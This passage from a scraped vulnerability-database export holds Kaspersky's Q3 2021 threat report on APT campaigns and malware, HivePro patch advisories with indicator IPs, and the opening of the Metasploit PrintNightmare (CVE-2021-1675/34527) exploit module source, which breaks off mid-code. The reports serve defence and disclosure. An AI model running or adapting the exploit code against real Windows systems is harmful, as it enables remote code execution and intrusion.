Targets include high-profile organizations: namely, government entities located both within those countries and abroad.\n\nMost APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims' identities or environment. It's not often we observe a large-scale attack by APT threat actors \u2013 they usually avoid such attacks because they are too 'noisy' and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections; although we think the campaign was aimed at a few targets of interest.\n\nThe attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.\n\nWe also observed a second infection vector that comes into play after the first one has successfully finished. 
The malware tries to spread to other hosts on the network by infecting USB drives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png>)\n\nIn addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png>)\n\nThe threat actor also deploys an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser.\n\nInfrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.\n\n### Targeted attacks exploiting CVE-2021-40444\n\nOn September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content \u2013 in particular, Microsoft Office applications.\n\nWe [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.\n\nTo exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. 
Then the script can use ActiveX controls to perform malicious actions on the victim's computer.\n\n### Tomiris backdoor linked to SolarWinds attack\n\nThe SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT's networks to perfect their attack. The following timeline sums up the different steps of the campaign.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01.png>)\n\nIn June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control \u2013 probably achieved by obtaining credentials to the control panel of the victims' registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png>)\n\nAfter this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. 
However, taken together they suggest the possibility of common authorship or shared development practices.\n\nYou can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).\n\n### GhostEmperor\n\nEarlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.\n\nThe rootkit is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png>)\n\nWe identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. 
This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04.png>)\n\nAlthough infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.\n\nThis toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.\n\n### FinSpy: analysis of current capabilities\n\nAt the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.\n\nAfter 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away \u2013 it was simply using various first-stage implants to hide its activities. 
We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.\n\nThe authors have gone to great lengths to make FinSpy inaccessible to security researchers \u2013 it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/24151828/SAS_story_FinFisher_02.png>)\n\nMoreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.\n\nApart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.\n\nThe user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim's iPhone has not been [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.\n\n## Other malware\n\n### REvil attack on MSPs and their customers worldwide\n\nAn attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.\n\nThe attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform.
The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.\n\nThe exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp.png>)\n\nThe attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).\n\nUsing our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.\n\n### What a [Print]Nightmare\n\nEarly in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. 
This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.\n\nMoreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft's Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.\n\nCVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. 
However, that is only possible if the attacker already has direct access to the vulnerable computer in question.\n\nCVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.\n\nYou can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).\n\n### Grandoreiro and Melcoz arrests\n\nIn July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.\n\nThe Grandoreiro banking Trojan family started its operations in Brazil, then expanded to other Latin American countries and later to Western Europe. The group has regularly improved its techniques and, based on our analysis of the group's campaigns, it operates as a [malware-as-a-service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project.
Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)\n\nMelcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it's likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device's memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)\n\nSince both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it's likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.\n\n### Gamers beware\n\nEarlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. 
The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)\n\n**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**\n\nThe authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a "lifetime license").\n\nOn top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.\n\nBloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)\n\nSo-called logs are among the most popular. These are databases containing reams of data for logging into accounts. 
In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that's about 0.2 cents per record).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)\n\nCybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.\n\nYou can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).\n\n### Triada Trojan in WhatsApp mod\n\nNot everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven't yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.\n\nThis happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky's mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user's device, and then, depending on the information, it downloads one of several other Trojans. 
You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).\n\n### Qakbot banking Trojan\n\nQakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins and passwords), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.\n\nThe Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter include virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, and the information obtained is used to lure victims into opening those emails.\n\nQakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.\n\nHowever, there is another infection vector that involves a malicious QakBot payload being transferred to the victim's machine via other malware on the compromised machine.
The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It's known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)\n\nWe analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% \u2013 from 10,493 in the previous year to 17,316 this year.\n\n_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_\n\nYou can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "href": "https://securelist.com/it-threat-evolution-q3-2021/104876/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the ](<https://www.hivepro.com/wp-content/uploads/2021/06/TA202120.pdf>)[pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202122.pdf>)\n\nAttackers have been targeting Windows Print Spooler services for almost 2 months now. It started with the vulnerability(CVE-2021-1675) being exploited in the wild. Soon a patch was released for the same. It was after 2 days that Microsoft found out that there exist another vulnerability which gives the attacker an access to execute a code in the victim\u2019s system. This new vulnerability(CVE-2021-34527) has been named as PrintNightmare. 
Microsoft has released an emergency patch for some versions, and a workaround has been made available for the other versions.\n\n#### Vulnerability Details\n\n\n\n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>\n\n#### References\n\n<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>\n\n<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=notificationEmail#rapid7-analysis>\n\n<https://www.kaspersky.com/blog/printnightmare-vulnerability/40520/>", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T13:50:55", "type": "hivepro", "title": "Emergency patches have been released by Microsoft for PrintNightmare", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T13:50:55", "id": "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5", "href": "https://www.hivepro.com/emergency-patches-have-been-released-by-microsoft-for-printnightmare/", "cvss": {"score": 
9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/07/TA202125.pdf>).\n\nA zero-day vulnerability (CVE-2021-35211) that impacts Serv-U Managed File Transfer and Serv-U Secure FTP is being exploited by multiple threat actors. The PoC of this exploited vulnerability was given to SolarWinds by Microsoft. SolarWinds has released a patch for it.\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise\n\n**Type**| **Value** \n---|--- \nIP Address| 98.176.196.89 \n68.235.178.32 \n208.113.35.58 \n \n#### Patch Link\n\n<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>\n\n#### References\n\n<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>\n\n<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T12:50:52", "type": "hivepro", "title": "Threat Actors are actively exploiting a SolarWinds Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-13T12:50:52", "id": "HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13", "href": "https://www.hivepro.com/threat-actors-are-actively-exploiting-a-solarwinds-zero-day/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-28T21:19:09", "description": "#### THREAT LEVEL: Green.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202136.pdf>)\n\nVMware has issued patches for 19 new vulnerabilities. CVE-2021-22005 is the worst of the lot, defined as "an arbitrary file upload vulnerability in the Analytics service" of the vCenter Server. An attacker with network access to vCenter Server's port 443 might use this flaw to execute code on the server by uploading a specially crafted file. VMware also provides a temporary workaround for individuals who are unable to instantly patch their appliances.\n\n#### Vulnerability Details\n\n  \n\n#### Patch Link\n\n<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>\n\n#### References\n\n<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>\n\n<https://www.theregister.com/2021/09/22/vmware_emergency_vcenter_patch_recommendation/>", "cvss3": {}, "published": "2021-09-22T13:29:07", "type": "hivepro", "title": "Drop everything and patch VMware\u2019s vCenter Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T13:29:07", "id": "HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "href": "https://www.hivepro.com/drop-everything-and-patch-vmwares-vcenter-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2023-06-24T15:45:01", "description": "The print spooler service can be abused by an authenticated remote 
attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.\n", "cvss3": {}, "published": "2022-05-16T18:56:46", "type": "metasploit", "title": "Print Spooler Remote DLL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-24T13:16:30", "id": "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/dcerpc/cve_2021_1675_printnightmare/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'windows_error'\nrequire 'ruby_smb'\nrequire 'ruby_smb/error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Server::Share\n include Msf::Exploit::Retry\n include Msf::Exploit::EXE\n include Msf::Exploit::Deprecated\n\n moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'\n\n PrintSystem = RubySMB::Dcerpc::PrintSystem\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Print Spooler Remote DLL Injection',\n 'Description' => %q{\n The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. 
This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.\n },\n 'Author' => [\n 'Zhiniang Peng', # vulnerability discovery / research\n 'Xuefeng Li', # vulnerability discovery / research\n 'Zhipeng Huo', # vulnerability discovery\n 'Piotr Madej', # vulnerability discovery\n 'Zhang Yunhai', # vulnerability discovery\n 'cube0x0', # PoC\n 'Spencer McIntyre', # metasploit module\n 'Christophe De La Fuente', # metasploit module co-author\n ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'SRVHOST' => Rex::Socket.source_address\n },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' => [\n [\n 'Windows', {\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X64, ARCH_X86 ]\n },\n ],\n ],\n 'DisclosureDate' => '2021-06-08',\n 'References' => [\n ['CVE', '2021-1675'],\n ['CVE', '2021-34527'],\n ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],\n ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],\n ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],\n ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']\n ],\n 'Notes' => {\n 'AKA' => [ 'PrintNightmare' ],\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [\n ARTIFACTS_ON_DISK # the dll will be copied to the remote server\n ]\n }\n )\n )\n\n register_advanced_options(\n [\n OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])\n ]\n )\n deregister_options('AutoCheck')\n end\n\n def check\n begin\n connect(backend: :ruby_smb)\n rescue Rex::ConnectionError\n return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::LoginError\n return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')\n end\n\n begin\n dcerpc_bind_spoolss\n rescue RubySMB::Error::UnexpectedStatusCode => e\n nt_status = 
::WindowsError::NTStatus.find_by_retval(e.status_code.value).first\n if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND\n print_error(\"The 'Print Spooler' service is disabled.\")\n end\n return Exploit::CheckCode::Safe(\"The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).\")\n end\n\n @target_arch = dcerpc_getarch\n # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43\n if @target_arch == ARCH_X64\n @environment = 'Windows x64'\n elsif @target_arch == ARCH_X86\n @environment = 'Windows NT x86'\n else\n return Exploit::CheckCode::Detected('Successfully bound to the remote service.')\n end\n\n print_status(\"Target environment: Windows v#{simple.client.os_version} (#{@target_arch})\")\n\n print_status('Enumerating the installed printer drivers...')\n drivers = enum_printer_drivers(@environment)\n @driver_path = \"#{drivers.driver_path.rpartition('\\\\').first}\\\\UNIDRV.DLL\"\n vprint_status(\"Using driver path: #{@driver_path}\")\n\n print_status('Retrieving the path of the printer driver directory...')\n @config_directory = get_printer_driver_directory(@environment)\n vprint_status(\"Using driver directory: #{@config_directory}\") unless @config_directory.nil?\n\n container = driver_container(\n p_config_file: 'C:\\\\Windows\\\\System32\\\\kernel32.dll',\n p_data_file: \"\\\\??\\\\UNC\\\\127.0.0.1\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll\"\n )\n\n case 